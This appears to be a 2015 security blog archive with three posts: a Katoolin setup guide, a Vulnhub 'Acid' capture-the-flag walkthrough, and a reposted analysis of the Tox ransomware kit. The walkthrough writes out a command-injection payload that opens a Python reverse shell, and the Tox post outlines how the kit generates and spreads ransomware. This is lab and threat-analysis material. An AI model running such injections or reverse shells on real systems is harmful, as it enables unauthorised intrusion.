Monday, October 12, 2015

[Tools] Katoolin

We all know Kali Linux is one of the most powerful platforms to conduct penetration testings. Why? Well, it is hard to beat a platform that comes packed with more than 600 applications ready to go.

Kali's new release: Kali Sana 2.0 came with a fancy new interface, powered by Gnome3, a cool side pane with shortcuts, an Ubuntu-like menu of applications, all this, all that.

Thing is, in older machines, all these changes didn't go that well. Take in consideration that this new fancy interface consumes about 700 MB RAM.

So with this scenario, have you ever thought "Is there a way to pack all these tools and put them in my favorite day to day distro?" Well, thanks to LionSec, now it is possible.

Here is Katoolin, as simple and fantastic as a python script, ready to be executed, it will add Kali's repositories to your distro, update the sources, install all the Kali tools and remove the repositories as if nothing happened, cool right?


  • Python 2.7
  • Of course, the base distro, in my case I will use Debian.


Go to the website and download the script from there:


From a terminal type:

  • apt-get install git
  • git clone

Once you downloaded the python script, all you have to do is give it execution permissions:

chmod +x

And then run it:


You will be presented with something like this:

First things first: type "1" to add Kali repositories and update the sources.

Then, type "2" to see all the different categories for the tools:

As you can see, you can select which tools to install, even the option to install them all (option 0), I wouldn't recommend this option though, in case any tool fails to install, it will be much easier to track if you go one by one, or category by category.

At the end, you can select which menu you want to install, there are 2 options:

  • ClassicMenu Indicator.
  • Kali Menu.
I selected the traditional Kali menu:

That's it. Now you have all your Kali tools in your favorite flavor.

Friday, October 2, 2015

[Walkthrough] Acid - Vulnhub

Decided to give it  a try to the Acid machine available at Vulnhub.

After downloading the machine I just had to open it with VMWare, as an FYI, it is set on Bridged by default, you can change this in the network settings though.

First things first, performed an nmap scan as usual, at the first result it showed all ports closed, so decided to go a bit deeper and scan all the 65535 ports, after a while (yeah, I know) the report showed only 1 port open, tcp port 33447 running Apache.

It is worth to notice the /Challenge attached in the nmap report. We will see more of that later. In the meantime, the main site looks like this:

Not much to see, decided to check the page source looking for some hints and at the bottom of the page there was some hexa code attached:


Which decoded turns into a base64 code:


which turns into wow.jpg

Decided to navigate to the common images folder /images/ and there it was the wow.jpg, downloaded it and after checking it with strings and exiftool didn't show anything interesting.

Remember that /Challenge/ folder? Yeah, about time to double check it.

We are presented with a charming message:

I tried some SQLI but it seems is not vulnerable. Later after I figured this form has default credentials that are available to anyone. Anyways...

At this point nothing much to keep moving, decided to fire up Dirbuster looking for some new folders to sniff around and after a while, it discovered 4 new files under the /Challenge/ directory:


  • protected_page.php shows nothing as I'm not logged in.
  • hacked.php shows you a form to put an ID, tried few things in this one, nothing worked.
  • cake,php aparently only contains a message, but if you take a look at the page title, it shows "/Magic_Box" which seems to be another path.

I gave Dirbuster another round (one of my favorite tools) and it discovered few new paths, /Magic_Box was indeed another path:


  • low.php showed absolutely nothing (blank page)
  • tails.php asks for a key to open the "Magical Doors"
  • command.php seems very interesting.
Checking the command.php it shows an interesting message and it also has a form to submit an IP address, however, the response was always the same, so decided to check the response in the background using Burpsuite, the application has the IP parameter as seen:

After reading about separating commands with semicolon (;) in this article:

I decided to try it here and wait for the response:

Next step to try is obtaining a reverse shell making use of this vulnerability to execute commands. After researching about reverse shell, I tried a few, without luck, after more research I came up with this code which worked smoothly, giving me access to the system, of course, a netcat listener is required before:

;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'&submit=submit

After sniffing aroun in the /home/ folder I found 2 users in the system:


Decided to continue looking for literally ANYTHING, after a while I found a folder in the / called /s.bin wich had a file named "investigate.php"

Opening this file contains the message: "Now you have to behave like an investigator to catch the culprit\n";

After taking a break, went back to check for more hidden files in the filesystem, checking one by one for any weird file/folder that could give some extra help, in the process, found a folder in the /sbin/ directory named "/sbin/raw_vs_isi", this folder contained a file "hint.pcapng".

pcapng is a dump file that is possible to open with WireShark, it looked something like this:

A lot of noise in the exchange, after a while reading of Wireshark filters (I'm not an expert on it) I gave this one a try to only see the destination and source between port 1337:

tcp.dstport == 1337 or tcp.srcport == 1337

After applying it, it only displayed the communication between .46 and .44, following the TCP Stream, it had a curious message behing:

It makes mention to the user that I already have by sniffing directories, saman, it also says that he is known by the alias of 1337hax0r, decided to try to sudo su with these credentials and lucky me, it worked fine, didn't have to escalate privileges looking for kernel vulnerabilities or so.

Now, all I had to do was capture the flag.txt located in the /root/ folder:

There it is. After finishing my OSCP certification I wanted to have my hands dirty with some good and safe environments to play with, thanks to +VulnHub that is possible.

I was stuck for a while, a lot of frustration but it was worth it :)

Thanks for reading.

Edit: The pictures suck, will adjust them later :P

Sunday, May 24, 2015

Tox - Malware Construction Kits

The packaging of malware and malware-construction kits for cybercrime “consumers” has been a long-running trend. Various turnkey kits that cover remote access plus botnet plus stealth functions are available just about anywhere. Ransomware, though very prevalent, has not yet appeared in force in easy-to-deploy kits.
But now we have Tox–and it’s free.

While sifting though our stream of “dark web” data, McAfee Labs found Tox on May 19. It was updated on May 21 with a new FAQ and an updated design. But the core did not change.

Salient Points:
  • Tox is free. You just have to register on the site.
  • Tox is dependent on TOR and Bitcoin. That allows for some degree of anonymity.
  • The malware works as advertised.
  • Out of the gate, the standard of antimalware evasion is fairly high, meaning the malware’s targets would need additional controls in place (HIPS, whitelisting, sandboxing) to catch or prevent this.
Once you register for the product, you can create your malware in three simple steps.
  • Enter the ransom amount. (The site takes 20% of the ransom.)
  • Enter your “cause.”
  • Submit the captcha.

This process creates an executable of about 2MB that is disguised as a .scr file. Then the Tox “customers” distribute and install as they see fit. The Tox site (on the TOR network) will track the installs and profit. To withdraw funds, you need only supply a receiving Bitcoin address.

 Upon execution, the malware encrypts the victims’ data and prompts them for the ransom, including the Bitcoin address for sending payment.

Technical Information
Although easy to use and functional, the malware appears to lack complexity and efficiency within the code.

Tox malware portable executable sections.
The developer has left several identifying strings within the code. Examples:
  • C:/Users/Swogo/Desktop/work/tox/cryptopp/secblock.h
  • C:/Users/Swogo/Desktop/work/tox/cryptopp/filters.h
  • C:/Users/Swogo/Desktop/work/tox/cryptopp/cryptlib.h
  • C:/Users/Swogo/Desktop/work/tox/cryptopp/simple.h
Tox-generated malware is compiled in MinGW and uses AES to encrypt client files via the Crypto++ library.  The Microsoft CryptoAPI is used for key generation.

Network Information
The malware first downloads Curl and the TOR client:
  • hxxp://
  • hxxp://
All downloaded files and artifacts are stored in the following path:
  • C:\Users\<username>\AppData\Roaming\
After execution, Tox will start TOR in SOCKS5 proxy mode with the following command-line parameters:
-socks5-hostname –data \

 We don’t expect Tox to be the last malware to embrace this model. We also anticipate more skilled development and variations in encryption and evasion techniques.

Source and credits: